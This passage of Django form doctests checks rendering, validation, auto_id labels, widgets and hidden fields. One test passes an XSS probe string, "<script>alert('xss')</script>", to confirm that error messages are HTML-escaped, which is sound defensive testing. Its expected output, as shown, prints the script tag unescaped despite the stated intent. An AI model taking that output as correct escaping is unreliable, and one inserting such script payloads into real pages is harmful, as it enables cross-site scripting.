<li><ul class="errorlist"><li>This field is required.</li></ul><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></li>
>>> print p.as_p()
<p><ul class="errorlist"><li>This field is required.</li></ul></p>
<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></p>
<p><ul class="errorlist"><li>This field is required.</li></ul></p>
<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></p>
<p><ul class="errorlist"><li>This field is required.</li></ul></p>
<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></p>
If you don't pass any values to the Form's __init__(), or if you pass None,
the Form will be considered unbound and won't do any validation. Form.errors
will be an empty dictionary *but* Form.is_valid() will return False.
>>> p = Person()
>>> p.is_bound
False
>>> p.errors
{}
>>> p.is_valid()
False
>>> p.cleaned_data
Traceback (most recent call last):
...
AttributeError: 'Person' object has no attribute 'cleaned_data'
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_table()
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_ul()
<li><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></li>
<li><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></li>
<li><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></li>
>>> print p.as_p()
<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></p>
<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></p>
<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></p>
Unicode values are handled properly.
>>> p = Person({'first_name': u'John', 'last_name': u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111', 'birthday': '1940-10-9'})
>>> p.as_table()
u'<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" value="John" id="id_first_name" /></td></tr>\n<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" id="id_last_name" /></td></tr>\n<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></td></tr>'
>>> p.as_ul()
u'<li><label for="id_first_name">First name:</label> <input type="text" name="first_name" value="John" id="id_first_name" /></li>\n<li><label for="id_last_name">Last name:</label> <input type="text" name="last_name" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" id="id_last_name" /></li>\n<li><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></li>'
>>> p.as_p()
u'<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" value="John" id="id_first_name" /></p>\n<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" id="id_last_name" /></p>\n<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></p>'
>>> p = Person({'last_name': u'Lennon'})
>>> p.errors
{'first_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
>>> p.is_valid()
False
>>> p.errors.as_ul()
u'<ul class="errorlist"><li>first_name<ul class="errorlist"><li>This field is required.</li></ul></li><li>birthday<ul class="errorlist"><li>This field is required.</li></ul></li></ul>'
>>> print p.errors.as_text()
* first_name
* This field is required.
* birthday
* This field is required.
>>> p.cleaned_data
Traceback (most recent call last):
...
AttributeError: 'Person' object has no attribute 'cleaned_data'
>>> p['first_name'].errors
[u'This field is required.']
>>> p['first_name'].errors.as_ul()
u'<ul class="errorlist"><li>This field is required.</li></ul>'
>>> p['first_name'].errors.as_text()
u'* This field is required.'
>>> p = Person()
>>> print p['first_name']
<input type="text" name="first_name" id="id_first_name" />
>>> print p['last_name']
<input type="text" name="last_name" id="id_last_name" />
>>> print p['birthday']
<input type="text" name="birthday" id="id_birthday" />
cleaned_data will always *only* contain a key for fields defined in the
Form, even if you pass extra data when you define the Form. In this
example, we pass a bunch of extra fields to the form constructor,
but cleaned_data contains only the form's fields.
>>> data = {'first_name': u'John', 'last_name': u'Lennon', 'birthday': u'1940-10-9', 'extra1': 'hello', 'extra2': 'hello'}
>>> p = Person(data)
>>> p.is_valid()
True
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
cleaned_data will include a key and value for *all* fields defined in the Form,
even if the Form's data didn't include a value for fields that are not
required. In this example, the data dictionary doesn't include a value for the
"nick_name" field, but cleaned_data includes it. For CharFields, it's set to the
empty string.
>>> class OptionalPersonForm(Form):
... first_name = CharField()
... last_name = CharField()
... nick_name = CharField(required=False)
>>> data = {'first_name': u'John', 'last_name': u'Lennon'}
>>> f = OptionalPersonForm(data)
>>> f.is_valid()
True
>>> f.cleaned_data
{'nick_name': u'', 'first_name': u'John', 'last_name': u'Lennon'}
For DateFields, it's set to None.
>>> class OptionalPersonForm(Form):
... first_name = CharField()
... last_name = CharField()
... birth_date = DateField(required=False)
>>> data = {'first_name': u'John', 'last_name': u'Lennon'}
>>> f = OptionalPersonForm(data)
>>> f.is_valid()
True
>>> f.cleaned_data
{'birth_date': None, 'first_name': u'John', 'last_name': u'Lennon'}
"auto_id" tells the Form to add an "id" attribute to each form element.
If it's a string that contains '%s', Django will use that as a format string
into which the field's name will be inserted. It will also put a <label> around
the human-readable labels for a field.
>>> p = Person(auto_id='%s_id')
>>> print p.as_table()
<tr><th><label for="first_name_id">First name:</label></th><td><input type="text" name="first_name" id="first_name_id" /></td></tr>
<tr><th><label for="last_name_id">Last name:</label></th><td><input type="text" name="last_name" id="last_name_id" /></td></tr>
<tr><th><label for="birthday_id">Birthday:</label></th><td><input type="text" name="birthday" id="birthday_id" /></td></tr>
>>> print p.as_ul()
<li><label for="first_name_id">First name:</label> <input type="text" name="first_name" id="first_name_id" /></li>
<li><label for="last_name_id">Last name:</label> <input type="text" name="last_name" id="last_name_id" /></li>
<li><label for="birthday_id">Birthday:</label> <input type="text" name="birthday" id="birthday_id" /></li>
>>> print p.as_p()
<p><label for="first_name_id">First name:</label> <input type="text" name="first_name" id="first_name_id" /></p>
<p><label for="last_name_id">Last name:</label> <input type="text" name="last_name" id="last_name_id" /></p>
<p><label for="birthday_id">Birthday:</label> <input type="text" name="birthday" id="birthday_id" /></p>
If auto_id is any True value whose str() does not contain '%s', the "id"
attribute will be the name of the field.
>>> p = Person(auto_id=True)
>>> print p.as_ul()
<li><label for="first_name">First name:</label> <input type="text" name="first_name" id="first_name" /></li>
<li><label for="last_name">Last name:</label> <input type="text" name="last_name" id="last_name" /></li>
<li><label for="birthday">Birthday:</label> <input type="text" name="birthday" id="birthday" /></li>
If auto_id is any False value, an "id" attribute won't be output unless it
was manually entered.
>>> p = Person(auto_id=False)
>>> print p.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
In this example, auto_id is False, but the "id" attribute for the "first_name"
field is given. Also note that field gets a <label>, while the others don't.
>>> class PersonNew(Form):
... first_name = CharField(widget=TextInput(attrs={'id': 'first_name_id'}))
... last_name = CharField()
... birthday = DateField()
>>> p = PersonNew(auto_id=False)
>>> print p.as_ul()
<li><label for="first_name_id">First name:</label> <input type="text" id="first_name_id" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
If the "id" attribute is specified in the Form and auto_id is True, the "id"
attribute in the Form gets precedence.
>>> p = PersonNew(auto_id=True)
>>> print p.as_ul()
<li><label for="first_name_id">First name:</label> <input type="text" id="first_name_id" name="first_name" /></li>
<li><label for="last_name">Last name:</label> <input type="text" name="last_name" id="last_name" /></li>
<li><label for="birthday">Birthday:</label> <input type="text" name="birthday" id="birthday" /></li>
>>> class SignupForm(Form):
... email = EmailField()
... get_spam = BooleanField()
>>> f = SignupForm(auto_id=False)
>>> print f['email']
<input type="text" name="email" />
>>> print f['get_spam']
<input type="checkbox" name="get_spam" />
>>> f = SignupForm({'email': 'test@example.com', 'get_spam': True}, auto_id=False)
>>> print f['email']
<input type="text" name="email" value="test@example.com" />
>>> print f['get_spam']
<input checked="checked" type="checkbox" name="get_spam" />
Any Field can have a Widget class passed to its constructor:
>>> class ContactForm(Form):
... subject = CharField()
... message = CharField(widget=Textarea)
>>> f = ContactForm(auto_id=False)
>>> print f['subject']
<input type="text" name="subject" />
>>> print f['message']
<textarea rows="10" cols="40" name="message"></textarea>
as_textarea(), as_text() and as_hidden() are shortcuts for changing the output
widget type:
>>> f['subject'].as_textarea()
u'<textarea rows="10" cols="40" name="subject"></textarea>'
>>> f['message'].as_text()
u'<input type="text" name="message" />'
>>> f['message'].as_hidden()
u'<input type="hidden" name="message" />'
The 'widget' parameter to a Field can also be an instance:
>>> class ContactForm(Form):
... subject = CharField()
... message = CharField(widget=Textarea(attrs={'rows': 80, 'cols': 20}))
>>> f = ContactForm(auto_id=False)
>>> print f['message']
<textarea rows="80" cols="20" name="message"></textarea>
Instance-level attrs are *not* carried over to as_textarea(), as_text() and
as_hidden():
>>> f['message'].as_text()
u'<input type="text" name="message" />'
>>> f = ContactForm({'subject': 'Hello', 'message': 'I love you.'}, auto_id=False)
>>> f['subject'].as_textarea()
u'<textarea rows="10" cols="40" name="subject">Hello</textarea>'
>>> f['message'].as_text()
u'<input type="text" name="message" value="I love you." />'
>>> f['message'].as_hidden()
u'<input type="hidden" name="message" value="I love you." />'
For a form with a <select>, use ChoiceField:
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')])
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
>>> f = FrameworkForm({'name': 'Django', 'language': 'P'}, auto_id=False)
>>> print f['language']
<select name="language">
<option value="P" selected="selected">Python</option>
<option value="J">Java</option>
</select>
A subtlety: If one of the choices' value is the empty string and the form is
unbound, then the <option> for the empty-string choice will get selected="selected".
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('', '------'), ('P', 'Python'), ('J', 'Java')])
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select name="language">
<option value="" selected="selected">------</option>
<option value="P">Python</option>
<option value="J">Java</option>
</select>
You can specify widget attributes in the Widget constructor.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')], widget=Select(attrs={'class': 'foo'}))
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
>>> f = FrameworkForm({'name': 'Django', 'language': 'P'}, auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P" selected="selected">Python</option>
<option value="J">Java</option>
</select>
When passing a custom widget instance to ChoiceField, note that setting
'choices' on the widget is meaningless. The widget will use the choices
defined on the Field, not the ones defined on the Widget.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')], widget=Select(choices=[('R', 'Ruby'), ('P', 'Perl')], attrs={'class': 'foo'}))
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
>>> f = FrameworkForm({'name': 'Django', 'language': 'P'}, auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P" selected="selected">Python</option>
<option value="J">Java</option>
</select>
You can set a ChoiceField's choices after the fact.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField()
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select name="language">
</select>
>>> f.fields['language'].choices = [('P', 'Python'), ('J', 'Java')]
>>> print f['language']
<select name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
Add widget=RadioSelect to use that widget with a ChoiceField.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')], widget=RadioSelect)
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<ul>
<li><label><input type="radio" name="language" value="P" /> Python</label></li>
<li><label><input type="radio" name="language" value="J" /> Java</label></li>
</ul>
>>> print f
<tr><th>Name:</th><td><input type="text" name="name" /></td></tr>
<tr><th>Language:</th><td><ul>
<li><label><input type="radio" name="language" value="P" /> Python</label></li>
<li><label><input type="radio" name="language" value="J" /> Java</label></li>
</ul></td></tr>
>>> print f.as_ul()
<li>Name: <input type="text" name="name" /></li>
<li>Language: <ul>
<li><label><input type="radio" name="language" value="P" /> Python</label></li>
<li><label><input type="radio" name="language" value="J" /> Java</label></li>
</ul></li>
Regarding auto_id and <label>, RadioSelect is a special case. Each radio button
gets a distinct ID, formed by appending an underscore plus the button's
zero-based index.
>>> f = FrameworkForm(auto_id='id_%s')
>>> print f['language']
<ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul>
When RadioSelect is used with auto_id, and the whole form is printed using
either as_table() or as_ul(), the label for the RadioSelect will point to the
ID of the *first* radio button.
>>> print f
<tr><th><label for="id_name">Name:</label></th><td><input type="text" name="name" id="id_name" /></td></tr>
<tr><th><label for="id_language_0">Language:</label></th><td><ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul></td></tr>
>>> print f.as_ul()
<li><label for="id_name">Name:</label> <input type="text" name="name" id="id_name" /></li>
<li><label for="id_language_0">Language:</label> <ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul></li>
>>> print f.as_p()
<p><label for="id_name">Name:</label> <input type="text" name="name" id="id_name" /></p>
<p><label for="id_language_0">Language:</label> <ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul></p>
MultipleChoiceField is a special case, as its data is required to be a list:
>>> class SongForm(Form):
... name = CharField()
... composers = MultipleChoiceField()
>>> f = SongForm(auto_id=False)
>>> print f['composers']
<select multiple="multiple" name="composers">
</select>
>>> class SongForm(Form):
... name = CharField()
... composers = MultipleChoiceField(choices=[('J', 'John Lennon'), ('P', 'Paul McCartney')])
>>> f = SongForm(auto_id=False)
>>> print f['composers']
<select multiple="multiple" name="composers">
<option value="J">John Lennon</option>
<option value="P">Paul McCartney</option>
</select>
>>> f = SongForm({'name': 'Yesterday', 'composers': ['P']}, auto_id=False)
>>> print f['name']
<input type="text" name="name" value="Yesterday" />
>>> print f['composers']
<select multiple="multiple" name="composers">
<option value="J">John Lennon</option>
<option value="P" selected="selected">Paul McCartney</option>
</select>
MultipleChoiceField rendered as_hidden() is a special case. Because it can
have multiple values, its as_hidden() renders multiple <input type="hidden">
tags.
>>> f = SongForm({'name': 'Yesterday', 'composers': ['P']}, auto_id=False)
>>> print f['composers'].as_hidden()
<input type="hidden" name="composers" value="P" />
>>> f = SongForm({'name': 'From Me To You', 'composers': ['P', 'J']}, auto_id=False)
>>> print f['composers'].as_hidden()
<input type="hidden" name="composers" value="P" />
<input type="hidden" name="composers" value="J" />
MultipleChoiceField can also be used with the CheckboxSelectMultiple widget.
>>> class SongForm(Form):
... name = CharField()
... composers = MultipleChoiceField(choices=[('J', 'John Lennon'), ('P', 'Paul McCartney')], widget=CheckboxSelectMultiple)
>>> f = SongForm(auto_id=False)
>>> print f['composers']
<ul>
<li><label><input type="checkbox" name="composers" value="J" /> John Lennon</label></li>
<li><label><input type="checkbox" name="composers" value="P" /> Paul McCartney</label></li>
</ul>
>>> f = SongForm({'composers': ['J']}, auto_id=False)
>>> print f['composers']
<ul>
<li><label><input checked="checked" type="checkbox" name="composers" value="J" /> John Lennon</label></li>
<li><label><input type="checkbox" name="composers" value="P" /> Paul McCartney</label></li>
</ul>
>>> f = SongForm({'composers': ['J', 'P']}, auto_id=False)
>>> print f['composers']
<ul>
<li><label><input checked="checked" type="checkbox" name="composers" value="J" /> John Lennon</label></li>
<li><label><input checked="checked" type="checkbox" name="composers" value="P" /> Paul McCartney</label></li>
</ul>
Regarding auto_id, CheckboxSelectMultiple is a special case. Each checkbox
gets a distinct ID, formed by appending an underscore plus the checkbox's
zero-based index.
>>> f = SongForm(auto_id='%s_id')
>>> print f['composers']
<ul>
<li><label><input type="checkbox" name="composers" value="J" id="composers_id_0" /> John Lennon</label></li>
<li><label><input type="checkbox" name="composers" value="P" id="composers_id_1" /> Paul McCartney</label></li>
</ul>
Data for a MultipleChoiceField should be a list. QueryDict and MultiValueDict
conveniently work with this.
>>> data = {'name': 'Yesterday', 'composers': ['J', 'P']}
>>> f = SongForm(data)
>>> f.errors
{}
>>> from django.http import QueryDict
>>> data = QueryDict('name=Yesterday&composers=J&composers=P')
>>> f = SongForm(data)
>>> f.errors
{}
>>> from django.utils.datastructures import MultiValueDict
>>> data = MultiValueDict(dict(name=['Yesterday'], composers=['J', 'P']))
>>> f = SongForm(data)
>>> f.errors
{}
The MultipleHiddenInput widget renders multiple values as hidden fields.
>>> class SongFormHidden(Form):
... name = CharField()
... composers = MultipleChoiceField(choices=[('J', 'John Lennon'), ('P', 'Paul McCartney')], widget=MultipleHiddenInput)
>>> f = SongFormHidden(MultiValueDict(dict(name=['Yesterday'], composers=['J', 'P'])), auto_id=False)
>>> print f.as_ul()
<li>Name: <input type="text" name="name" value="Yesterday" /><input type="hidden" name="composers" value="J" />
<input type="hidden" name="composers" value="P" /></li>
When using CheckboxSelectMultiple, the framework expects a list of input and
returns a list of input.
>>> f = SongForm({'name': 'Yesterday'}, auto_id=False)
>>> f.errors
{'composers': [u'This field is required.']}
>>> f = SongForm({'name': 'Yesterday', 'composers': ['J']}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'composers': [u'J'], 'name': u'Yesterday'}
>>> f = SongForm({'name': 'Yesterday', 'composers': ['J', 'P']}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'composers': [u'J', u'P'], 'name': u'Yesterday'}
Validation errors are HTML-escaped when output as HTML.
>>> class EscapingForm(Form):
... special_name = CharField()
... def clean_special_name(self):
... raise ValidationError("Something's wrong with '%s'" % self.cleaned_data['special_name'])
>>> f = EscapingForm({'special_name': "Nothing to escape"}, auto_id=False)
>>> print f
<tr><th>Special name:</th><td><ul class="errorlist"><li>Something's wrong with 'Nothing to escape'</li></ul><input type="text" name="special_name" value="Nothing to escape" /></td></tr>
>>> f = EscapingForm({'special_name': "Should escape < & > and <script>alert('xss')</script>"}, auto_id=False)
>>> print f
<tr><th>Special name:</th><td><ul class="errorlist"><li>Something's wrong with 'Should escape < & > and <script>alert('xss')</script>'</li></ul><input type="text" name="special_name" value="Should escape < & > and <script>alert('xss')</script>" /></td></tr>
# Validating multiple fields in relation to another ###########################
There are a couple of ways to do multiple-field validation. If you want the
validation message to be associated with a particular field, implement the
clean_XXX() method on the Form, where XXX is the field name. As in
Field.clean(), the clean_XXX() method should return the cleaned value. In the
clean_XXX() method, you have access to self.cleaned_data, which is a dictionary
of all the data that has been cleaned *so far*, in order by the fields,
including the current field (e.g., the field XXX if you're in clean_XXX()).
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean_password2(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data['password2']
>>> f = UserRegistration(auto_id=False)
>>> f.errors
{}
>>> f = UserRegistration({}, auto_id=False)
>>> f.errors
{'username': [u'This field is required.'], 'password1': [u'This field is required.'], 'password2': [u'This field is required.']}
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)
>>> f.errors
{'password2': [u'Please make sure your passwords match.']}
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'foo'}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'username': u'adrian', 'password1': u'foo', 'password2': u'foo'}
Another way of doing multiple-field validation is by implementing the
Form's clean() method. If you do this, any ValidationError raised by that
method will not be associated with a particular field; it will have a
special-case association with the field named '__all__'.
Note that in Form.clean(), you have access to self.cleaned_data, a dictionary of
all the fields/values that have *not* raised a ValidationError. Also note
Form.clean() is required to return a dictionary of all clean data.
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data
>>> f = UserRegistration(auto_id=False)
>>> f.errors
{}
>>> f = UserRegistration({}, auto_id=False)
>>> print f.as_table()
<tr><th>Username:</th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="username" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="password" name="password1" /></td></tr>
<tr><th>Password2:</th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="password" name="password2" /></td></tr>
>>> f.errors
{'username': [u'This field is required.'], 'password1': [u'This field is required.'], 'password2': [u'This field is required.']}
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)
>>> f.errors
{'__all__': [u'Please make sure your passwords match.']}
>>> print f.as_table()
<tr><td colspan="2"><ul class="errorlist"><li>Please make sure your passwords match.</li></ul></td></tr>
<tr><th>Username:</th><td><input type="text" name="username" value="adrian" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><input type="password" name="password1" value="foo" /></td></tr>
<tr><th>Password2:</th><td><input type="password" name="password2" value="bar" /></td></tr>
>>> print f.as_ul()
<li><ul class="errorlist"><li>Please make sure your passwords match.</li></ul></li>
<li>Username: <input type="text" name="username" value="adrian" maxlength="10" /></li>
<li>Password1: <input type="password" name="password1" value="foo" /></li>
<li>Password2: <input type="password" name="password2" value="bar" /></li>
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'foo'}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'username': u'adrian', 'password1': u'foo', 'password2': u'foo'}
# Dynamic construction ########################################################
It's possible to construct a Form dynamically by adding to the self.fields
dictionary in __init__(). Don't forget to call Form.__init__() within the
subclass' __init__().
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... def __init__(self, *args, **kwargs):
... super(Person, self).__init__(*args, **kwargs)
... self.fields['birthday'] = DateField()
>>> p = Person(auto_id=False)
>>> print p
<tr><th>First name:</th><td><input type="text" name="first_name" /></td></tr>
<tr><th>Last name:</th><td><input type="text" name="last_name" /></td></tr>
<tr><th>Birthday:</th><td><input type="text" name="birthday" /></td></tr>
Instances of a dynamic Form do not persist fields from one Form instance to
the next.
>>> class MyForm(Form):
... def __init__(self, data=None, auto_id=False, field_list=[]):
... Form.__init__(self, data, auto_id)
... for field in field_list:
... self.fields[field[0]] = field[1]
>>> field_list = [('field1', CharField()), ('field2', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Field1:</th><td><input type="text" name="field1" /></td></tr>
<tr><th>Field2:</th><td><input type="text" name="field2" /></td></tr>
>>> field_list = [('field3', CharField()), ('field4', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Field3:</th><td><input type="text" name="field3" /></td></tr>
<tr><th>Field4:</th><td><input type="text" name="field4" /></td></tr>
>>> class MyForm(Form):
... default_field_1 = CharField()
... default_field_2 = CharField()
... def __init__(self, data=None, auto_id=False, field_list=[]):
... Form.__init__(self, data, auto_id)
... for field in field_list:
... self.fields[field[0]] = field[1]
>>> field_list = [('field1', CharField()), ('field2', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Default field 1:</th><td><input type="text" name="default_field_1" /></td></tr>
<tr><th>Default field 2:</th><td><input type="text" name="default_field_2" /></td></tr>
<tr><th>Field1:</th><td><input type="text" name="field1" /></td></tr>
<tr><th>Field2:</th><td><input type="text" name="field2" /></td></tr>
>>> field_list = [('field3', CharField()), ('field4', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Default field 1:</th><td><input type="text" name="default_field_1" /></td></tr>
<tr><th>Default field 2:</th><td><input type="text" name="default_field_2" /></td></tr>
<tr><th>Field3:</th><td><input type="text" name="field3" /></td></tr>
<tr><th>Field4:</th><td><input type="text" name="field4" /></td></tr>
Similarly, changes to field attributes do not persist from one Form instance
to the next.
>>> class Person(Form):
... first_name = CharField(required=False)
... last_name = CharField(required=False)
... def __init__(self, names_required=False, *args, **kwargs):
... super(Person, self).__init__(*args, **kwargs)
... if names_required:
... self.fields['first_name'].required = True
... self.fields['last_name'].required = True
>>> f = Person(names_required=False)
>>> f['first_name'].field.required, f['last_name'].field.required
(False, False)
>>> f = Person(names_required=True)
>>> f['first_name'].field.required, f['last_name'].field.required
(True, True)
>>> f = Person(names_required=False)
>>> f['first_name'].field.required, f['last_name'].field.required
(False, False)
>>> class Person(Form):
... first_name = CharField(max_length=30)
... last_name = CharField(max_length=30)
... def __init__(self, name_max_length=None, *args, **kwargs):
... super(Person, self).__init__(*args, **kwargs)
... if name_max_length:
... self.fields['first_name'].max_length = name_max_length
... self.fields['last_name'].max_length = name_max_length
>>> f = Person(name_max_length=None)
>>> f['first_name'].field.max_length, f['last_name'].field.max_length
(30, 30)
>>> f = Person(name_max_length=20)
>>> f['first_name'].field.max_length, f['last_name'].field.max_length
(20, 20)
>>> f = Person(name_max_length=None)
>>> f['first_name'].field.max_length, f['last_name'].field.max_length
(30, 30)
HiddenInput widgets are displayed differently in the as_table(), as_ul()
and as_p() output of a Form -- their verbose names are not displayed, and a
separate row is not displayed. They're displayed in the last row of the
form, directly after that row's form element.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... hidden_text = CharField(widget=HiddenInput)
... birthday = DateField()
>>> p = Person(auto_id=False)
>>> print p
<tr><th>First name:</th><td><input type="text" name="first_name" /></td></tr>
<tr><th>Last name:</th><td><input type="text" name="last_name" /></td></tr>
<tr><th>Birthday:</th><td><input type="text" name="birthday" /><input type="hidden" name="hidden_text" /></td></tr>
>>> print p.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /><input type="hidden" name="hidden_text" /></li>
>>> print p.as_p()
<p>First name: <input type="text" name="first_name" /></p>
<p>Last name: <input type="text" name="last_name" /></p>
<p>Birthday: <input type="text" name="birthday" /><input type="hidden" name="hidden_text" /></p>
With auto_id set, a HiddenInput still gets an ID, but it doesn't get a label.
>>> p = Person(auto_id='id_%s')
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" id="id_birthday" /><input type="hidden" name="hidden_text" id="id_hidden_text" /></td></tr>
>>> print p.as_ul()
<li><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></li>
<li><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></li>
<li><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /><input type="hidden" name="hidden_text" id="id_hidden_text" /></li>
>>> print p.as_p()
<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></p>
<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></p>
<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /><input type="hidden" name="hidden_text" id="id_hidden_text" /></p>
If a field with a HiddenInput has errors, the as_table() and as_ul() output
will include the error message(s) with the text "(Hidden field [fieldname]) "
prepended. This message is displayed at the top of the output, regardless of
its field's order in the form.
>>> p = Person({'first_name': 'John', 'last_name': 'Lennon', 'birthday': '1940-10-9'}, auto_id=False)
>>> print p
<tr><td colspan="2"><ul class="errorlist"><li>(Hidden field hidden_text) This field is required.</li></ul></td></tr>
<tr><th>First name:</th><td><input type="text" name="first_name" value="John" /></td></tr>
<tr><th>Last name:</th><td><input type="text" name="last_name" value="Lennon" /></td></tr>
<tr><th>Birthday:</th><td><input type="text" name="birthday" value="1940-10-9" /><input type="hidden" name="hidden_text" /></td></tr>
>>> print p.as_ul()
<li><ul class="errorlist"><li>(Hidden field hidden_text) This field is required.</li></ul></li>
